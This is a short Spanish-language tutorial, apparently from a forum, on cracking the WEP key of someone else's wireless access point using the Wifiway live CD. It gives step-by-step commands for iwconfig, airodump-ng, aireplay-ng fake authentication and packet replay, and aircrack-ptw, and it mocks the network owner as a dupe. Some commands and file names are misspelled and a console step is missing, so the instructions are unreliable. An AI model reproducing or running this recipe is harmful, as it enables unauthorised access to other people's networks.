Esto se hace con sistema operativo Linux de un CD live que es el wifiway en una lap-top de preferencia que tenga tarjeta de red broadcom o 3com ya que las otras no las reconoce o es un tanto cuanto engorroso darlas de alta para los que no sabemos
Asi es que esas son mis recomendaciones.
Consola 1
Primer paso - Se teclea iwconfig para saber como se cargo la tarjeta de red inalámbrica
Ejemp eth0 o eth1
Segundo paso - Se Teclea airodump-ng eth0 para ver las redes que están disponibles (aquí seleccionamos la red que queremos, copiamos la dirección MAC del AP a asi como el numero del canal CH ) para detener teclea ctrl+c
Primer paso – Se teclea aireplay-ng -1 0 –a (MAC del AP a Crackear) –h (tu numero de MAC) –e Nombre del red del AP eth0 esto es para autentificar la MAC tuya con la MAC del incauto : - ) solo si sale la carita feliz estas auteticado
Segundo paso - Se teclea aireplay-ng -3 –b (MAC del AP a crackear) –h (tu numero de MAC) eth0 con esto lo que vamos a hacer es mandar paquetes al AP hasta que los paquetes #DATA pasen los 200 000 paquetes se pasa a la Consola 3 se deja corriendo.
Consola 3
Primer paso – Se Teclea dir*.cap para ver cuantos archivos genero por lo general solo crea el archivo x-01.cab
Segundo paso – Se teclea airecrack-ptw x-01.cap aquí muestra la clave hasta que tiene los paquetes suficientes si no sale correrlo con todos los archivos x-0*.cap que cree